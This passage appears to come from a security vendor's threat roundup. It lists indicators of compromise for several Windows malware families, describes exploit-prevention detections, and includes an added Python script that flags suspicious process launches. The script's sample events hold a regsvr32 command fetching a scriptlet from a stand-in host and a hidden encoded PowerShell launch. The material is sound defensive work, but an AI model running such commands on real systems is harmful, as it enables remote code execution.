06edfc4f5cb04fb6d27b245e5ff79174d7aa6c9482bc0fb1f1ed79be29096132
07d1ec208adcd09b8a8b9a12ae20bf2e4bb88af5374b939e6ae081d2c8e40234
082a95b01c99eda9e48dddca56279d94a226d15c1a7a95b493c062532781c4c4
098dbdd146d1db5536cc94d6fce4b66ac4c7b6cfdb8772d2df20cab9960b69e9
09c56735221939616954e881f453d2a4c29f0d4a02551c94db69eb69e8a0d2af
09cdd86f7bfe44b61a8e50337b28d3b4f99d41d16766302a0a08a17109559a7f
0c96b389bc2da901cdadcf196b387eece711bc5e9020914d4e8e63eaf55ce06c
0d2cd6dbe7b0dec1cabd447a81e1700de2aa99b85867e4ef1dba6db614ff0a99
0fa272906d8b0bda65f7511dd613a7c9c2144388c949a1c80f1ecd02726cd8a6
103a7fe55b3ccfa87bb95ac53a1e640959625f7853ea50b420ec4da60cf5284c
10a3bf15ae07663acba1dcc99a27a4f7d6e85f3b94f60b9bfda256f0a83646d9
10d6de44ff31e0f2d6a04c452729de679adf2ddfb9d47968f22ca6fca575014b
12a6e724d6896e84e649de02e0b70906bc157a475edfe385a389e85372d2bff5
12f193885a086d3737e10f6db885be34d3e81c72ebbd4f22f6f26d78233b8adc
14b570f7c6f11231627b74d13e8a9768b9fe4a4076c4baff231dff0072c28b38
157974b9ca635adaf410b939ef10981085f703b3754df653eae9eedba40c3f72
170d8c90cb7515c2935af76c88c358d2e9c39855ebf546df66f6819686c0d5b6
179087cf99c61c6c5468d741409768ecc466241dc4e7ffa00aca85b0c3a007e9

*See JSON for more IOCs

Coverage

Product (protection)
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.TinyBanker-9877962-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 39 samples
Registry Keys (occurrences)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: F9E7DE7B
39
Mutexes (occurrences)
F9E7DE7B 39
<random, matching [a-zA-Z0-9]{5,9}> 25
IP Addresses contacted by malware (occurrences). Does not indicate maliciousness.
216[.]218[.]185[.]162 25
192[.]42[.]116[.]41 8
Domain Names contacted by malware (occurrences). Does not indicate maliciousness.
spaines[.]pw 25
vcklmnnejwxx[.]pw 8
uyhgqunqkxnx[.]pw 8
cmnsgscccrej[.]pw 6
mfueeimvyrsp[.]pw 2
evbsdqvgmpph[.]pw 2
Files and/or directories created (occurrences)
%HOMEPATH%\AppData\LocalLow\F9E7DE7B 39
%APPDATA%\F9E7DE7B 39
%APPDATA%\F9E7DE7B\bin.exe 39
%APPDATA%\<random, matching '[A-F0-9]{8}'>\bin.exe 25

File Hashes
*See JSON for more IOCs

Coverage

Product (protection)
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


MITRE ATT&CK


Win.Virus.Xpiro-9877934-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys (occurrences)
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VDS
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VDS
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WBENGINE
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WBENGINE
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMIAPSRV
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMIAPSRV
Value Name: Start
15
<HKLM>\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 15
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM
Value Name: EnableSmartScreen
15
<HKLM>\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: EnableNotifications
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ALG
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EHRECVR
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EHSCHED
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FAX
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICROSOFT SHAREPOINT WORKSPACE AUDIT SERVICE
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSDTC
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SNMPTRAP
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMPNETWORKSVC
Value Name: Start
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS
Value Name: Startup
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USER SHELL FOLDERS
Value Name: Startup
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FAX
Value Name: ObjectName
15
Mutexes (occurrences)
Global\mlbjlegc 15
eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-18 4
Global\Media Center Tuner Request 4
Global\jdjdecjh 1
Global\kfebgdcg 1
Global\fhhfeehg 1
Global\dgefjmfe 1
Global\kajekfjk 1
Global\ghdfjhkd 1
Global\idkkfjla 1
Global\hiifcmdi 1
Global\kcifgedf 1
Global\kcciclkm 1
Global\deelbaab 1
Global\hehmkhfg 1
Global\dbgkfaal 1
Global\ifmefakg 1
Global\eccbmgkf 1
Files and/or directories created (occurrences)
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 15
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 15
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 15
%ProgramFiles%\Windows Media Player\wmpnetwk.exe 15
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 15
%SystemRoot%\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe 15
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 15
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 15
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 15
%System32%\FXSSVC.exe 15
%System32%\UI0Detect.exe 15
%System32%\VSSVC.exe 15
%System32%\alg.exe 15
%System32%\dllhost.exe 15
%System32%\ieetwcollector.exe 15
%System32%\msdtc.exe 15
%System32%\msiexec.exe 15
%System32%\snmptrap.exe 15
%System32%\vds.exe 15
%System32%\wbem\WmiApSrv.exe 15
%System32%\wbengine.exe 15
%SystemRoot%\ehome\ehrecvr.exe 15
%SystemRoot%\ehome\ehsched.exe 15
%SystemRoot%\SysWOW64\dllhost.exe 15
%SystemRoot%\SysWOW64\msiexec.exe 15

*See JSON for more IOCs

File Hashes

Coverage

Product (protection)
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.DarkComet-9876875-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 31 samples
Registry Keys (occurrences)
<HKCU>\SOFTWARE\DC3_FEXEC 28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 24
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN 24
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: StartupKey
22
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
21
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
21
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN
Value Name: NoControlPanel
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION 21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: StartUp
1
Mutexes (occurrences)
DC_MUTEX-<random, matching [A-Z0-9]{7}> 29
DCPERSFWBP 22
IP Addresses contacted by malware (occurrences). Does not indicate maliciousness.
185[.]86[.]148[.]81 10
172[.]217[.]10[.]110 3
192[.]169[.]69[.]25 3
23[.]10[.]88[.]237 3
64[.]4[.]54[.]254 3
40[.]91[.]78[.]9 3
23[.]78[.]173[.]83 3
13[.]107[.]246[.]18 3
108[.]61[.]190[.]137 3
13[.]107[.]21[.]200 2
104[.]18[.]10[.]39 2
140[.]82[.]114[.]4 2
185[.]199[.]110[.]133 2
142[.]250[.]123[.]154/31 2
13[.]107[.]246[.]70 2
81[.]147[.]92[.]156 2
54[.]158[.]67[.]235 2
45[.]32[.]150[.]8 2
151[.]101[.]2[.]217 1
151[.]101[.]194[.]217 1
151[.]101[.]66[.]217 1
104[.]18[.]11[.]39 1
172[.]217[.]197[.]102 1
140[.]82[.]112[.]3 1
104[.]23[.]98[.]190 1

*See JSON for more IOCs

Domain Names contacted by malware (occurrences). Does not indicate maliciousness.
thefatskid[.]duckdns[.]org 10
github[.]com 3
c1[.]microsoft[.]com 3
cdn[.]speedcurve[.]com 3
docs[.]microsoft[.]com 3
go[.]microsoft[.]com 3
stats[.]g[.]doubleclick[.]net 3
w[.]usabilla[.]com 3
wcpstatic[.]microsoft[.]com 3
web[.]vortex[.]data[.]microsoft[.]com 3
www[.]bing[.]com 3
www[.]google-analytics[.]com 3
avatars[.]githubusercontent[.]com 3
cacerts[.]digicert[.]com 3
js[.]monitor[.]azure[.]com 3
grinders[.]duckdns[.]org 3
Files and or directories created    Occurrences
%APPDATA%\StartupKey.exe 28
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\<exe name>.log 28
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\msdcsc.exe.log 25
%APPDATA%\dclogs 23
%TEMP%\MSDCSC 13
%TEMP%\MSDCSC\msdcsc.exe 13
%HOMEPATH%\Documents\MSDCSC 11
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe 11
%HOMEPATH%\My Documents\MSDCSC\msdcsc.exe 1
%System32%\MSDCSC\msdcsc.exe 1
%APPDATA%\StartUp.exe 1
%APPDATA%\MSDCSC 1
%APPDATA%\MSDCSC\msdcsc.exe 1
%TEMP%\MSDCSC.exe 1
%HOMEPATH%\Documents\MSDCSC\MicrosoftKey 1
%HOMEPATH%\Documents\Microsoft 1
%HOMEPATH%\Documents\Microsoft\StartUp.exe 1

File Hashes
*See JSON for more IOCs

Coverage

Product    Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Hupigon-9876962-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 24 samples
Registry Keys    Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nrrtvxxz
5
Mutexes    Occurrences
eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 5
nrrtvxxz.exe 5
QOYEMZYSBHMYXRPRVUNURZTPFFOFKWOP 1
LLDMYBVTBESI@SKVWMMDJPAOTQERPOHB 1
TIAEVGHDGQHFRSBXFJXOXIKNQQLNXURY 1
RLLRFITDSIALICNEHUADZQQFUH@HUOVH 1
@BFPEJRAMTTSNOSXVMCIFOXUFCPRHZEV 1
IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
203[.]205[.]254[.]103 5
Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
i[.]qq[.]com 5
user[.]qzone[.]qq[.]com 5
Files and or directories created    Occurrences
%SystemRoot%\nrrtvxxz.exe 5

File Hashes
Coverage

Product    Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (17235)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (4097)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Reverse tcp payload detected - (3203)
An exploit payload intended to connect back to an attacker-controlled host over TCP has been detected.
Crystalbit-Apple DLL double hijack detected - (1495)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
CVE-2020-1472 exploit detected - (1299)
An attempt to exploit CVE-2020-1472, also known as "Zerologon", has been detected. This is a privilege escalation vulnerability in Netlogon.
A Microsoft Office process has started a windows utility. - (707)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
Dealply adware detected - (635)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Squiblydoo application control bypass attempt detected. - (631)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
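The three behaviors described above for PowerShell, Office-spawned utilities and Squiblydoo are all visible in process-creation telemetry. The following is an added example, not code from the Talos post or from AMP: a small rule set run over constructed sample events. The event fields (parent image, image, command line), the 1024-character PowerShell threshold, the list of Office and utility process names, and the sample command lines are all assumptions chosen for the example.

```python
"""
Added example (not Talos or AMP code): rule-based checks over constructed
process-creation events for three behaviors the Exploit Prevention section
names: an Office process starting a Windows utility, an excessively long
PowerShell command line, and regsvr32 pointed at remote script content.
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple

# Process names are compared case-insensitively on the file basename.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WINDOWS_UTILITIES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                     "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Assumed cut-off for "excessively long"; the post does not publish AMP's value.
LONG_POWERSHELL_THRESHOLD = 1024
# regsvr32 given a URL through its /i: (or -i:) argument matches the post's
# "script content hosted on an attacker controlled server" description.
REMOTE_SCRIPTLET = re.compile(r'[/-]i:\s*"?https?://', re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (assumed field set, e.g. from an EDR)."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawned_utility(ev: ProcessEvent) -> bool:
    """Office parent (WINWORD, EXCEL, ...) started cmd/powershell/etc."""
    return (basename(ev.parent_image) in OFFICE_IMAGES
            and basename(ev.image) in WINDOWS_UTILITIES)


def long_powershell_command(ev: ProcessEvent,
                            threshold: int = LONG_POWERSHELL_THRESHOLD) -> bool:
    """PowerShell launched with a command line at or above the threshold."""
    return (basename(ev.image) in {"powershell.exe", "pwsh.exe"}
            and len(ev.command_line) >= threshold)


def squiblydoo_regsvr32(ev: ProcessEvent) -> bool:
    """regsvr32 asked to load a scriptlet from an http(s) location."""
    return (basename(ev.image) == "regsvr32.exe"
            and REMOTE_SCRIPTLET.search(ev.command_line) is not None)


RULES: List[Tuple[str, Callable[[ProcessEvent], bool]]] = [
    ("office_spawned_utility", office_spawned_utility),
    ("long_powershell_command", long_powershell_command),
    ("squiblydoo_regsvr32", squiblydoo_regsvr32),
]


def evaluate(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    hits: List[Tuple[int, str]] = []
    for idx, ev in enumerate(events):
        for name, rule in RULES:
            if rule(ev):
                hits.append((idx, name))
    return hits


# Constructed sample events; the long argument is padding, not a real script.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c dir"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -EncodedCommand " + "A" * 2000),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -Command Get-Process"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\regsvr32.exe",
                 "regsvr32.exe /s /i:http://example.invalid/x.sct scrobj.dll"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo hi"),
]


if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Event 1 fires two rules at once (Office parent and an over-length PowerShell command line), which is the combination the post calls out as typical of malicious documents; events 0 and 2 are ordinary administrative use and stay quiet. In production the basename match on `parent_image` should be backed by a check on the process's signer or full path, since a renamed binary defeats name-only rules.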
Kovter injection detected - (164)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
CVE-2019-0708 detected - (83)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.